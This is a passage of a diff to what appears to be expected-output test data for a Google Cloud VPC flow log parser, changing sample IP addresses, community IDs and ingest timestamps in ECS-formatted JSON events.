"address": "198.51.100.107", + "address": "67.43.156.14", "port": 56478, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -23781,7 +23781,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bLZCzhETfwqvL9yQ1jHjTJwKork=", + "community_id": "1:ZjB7c0mLOtmDfg7yu+dLPbrvJHQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -23796,7 +23796,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -23820,8 +23820,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869272800Z", - "original": "{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392501400Z", + "original": "{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:20.450631492Z", "end": "2019-06-14T03:47:20.566586739Z", @@ -23842,10 +23842,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -23859,7 +23859,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:N5r6MyBXAb6L/bLUGnRfhE2dyYM=", + "community_id": "1:eQxAd3pzSyZzZxiE+1RzMSqyG04=", "bytes": 64140, "name": "default", "transport": "tcp", @@ -23882,7 +23882,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -23918,8 +23918,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869275500Z", - "original": "{\"insertId\":\"1gq7q7afe373e9\",\"jsonPayload\":{\"bytes_sent\":\"64140\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"371\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392507100Z", + "original": "{\"insertId\":\"1gq7q7afe373e9\",\"jsonPayload\":{\"bytes_sent\":\"64140\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"371\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -23946,17 +23946,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53096, "bytes": 1458, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:46cExc+emRbBX/kM/ZWcv8rVUgE=", + "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -23970,7 +23970,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -23995,8 +23995,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869278200Z", - "original": "{\"insertId\":\"1gq7q7afe373f9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392512800Z", + "original": "{\"insertId\":\"1gq7q7afe373f9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:43:20.700692281Z", "end": "2019-06-14T03:43:20.813699795Z", @@ -24023,18 +24023,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 231764, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:N5r6MyBXAb6L/bLUGnRfhE2dyYM=", + "community_id": "1:eQxAd3pzSyZzZxiE+1RzMSqyG04=", "bytes": 231764, "name": "default", "transport": "tcp", @@ -24056,7 +24056,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -24093,8 +24093,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869280900Z", - "original": "{\"insertId\":\"1gq7q7afe373f1\",\"jsonPayload\":{\"bytes_sent\":\"231764\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392518300Z", + "original": "{\"insertId\":\"1gq7q7afe373f1\",\"jsonPayload\":{\"bytes_sent\":\"231764\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -24117,9 +24117,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65276, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -24133,7 +24133,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BPNXWYQI8he7USxOsykyWmD0NE8=", + "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", "bytes": 107878, "transport": "tcp", "type": "ipv4", @@ -24148,7 +24148,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -24172,8 +24172,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869283600Z", - "original": "{\"insertId\":\"1gq7q7afe373ff\",\"jsonPayload\":{\"bytes_sent\":\"107878\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65276,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"614\",\"reporter\":\"SRC\",\"rtt_msec\":\"156\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392523800Z", + "original": "{\"insertId\":\"1gq7q7afe373ff\",\"jsonPayload\":{\"bytes_sent\":\"107878\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65276,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"614\",\"reporter\":\"SRC\",\"rtt_msec\":\"156\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760349279Z", "end": "2019-06-14T03:49:56.220621567Z", @@ -24200,18 +24200,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 52430, "bytes": 595838, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 299 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Ymi/D60yNYon9EIJPZfAYxcQ+xc=", + "community_id": "1:qGRQsZIORaZZvgSDCjliRbZbsD0=", "bytes": 595838, "name": "default", "transport": "tcp", @@ -24233,7 +24233,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, @@ -24270,8 +24270,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869286900Z", - "original": "{\"insertId\":\"1gq7q7afe373fq\",\"jsonPayload\":{\"bytes_sent\":\"595838\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":52430},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"299\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392528Z", + "original": "{\"insertId\":\"1gq7q7afe373fq\",\"jsonPayload\":{\"bytes_sent\":\"595838\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52430},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"299\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:07.968717244Z", "end": "2019-06-14T03:49:53.081386115Z", @@ -24292,9 +24292,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 56410, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -24308,7 +24308,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0c52Gpv2d5YT01CRixtDXpBMSJQ=", + "community_id": "1:4Pc6C8KshAP3IEqmZaW0jzA00wQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -24323,7 +24323,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -24347,8 +24347,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869289700Z", - "original": "{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392532700Z", + "original": "{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:47:10.514594429Z", "end": "2019-06-14T03:47:10.630345069Z", @@ -24369,9 +24369,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51950, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -24385,7 +24385,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pHA6HHmyea3zNeMwTBqwG+WoGI0=", + "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -24400,7 +24400,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -24424,8 +24424,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869292400Z", - "original": "{\"insertId\":\"14iipwlfd8t01j\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":51950,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392537700Z", + "original": "{\"insertId\":\"14iipwlfd8t01j\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51950,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:50.645030007Z", "end": "2019-06-14T03:41:50.757658840Z", @@ -24446,10 +24446,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33876, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -24463,7 +24463,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dURBkayd+umbcZOJIS7+sTQjLag=", + "community_id": "1:E5NvH5JkoYJgVzpBa96RbCFEXPs=", "bytes": 361966, "name": "default", "transport": "tcp", @@ -24486,7 +24486,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -24522,8 +24522,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869298700Z", - "original": 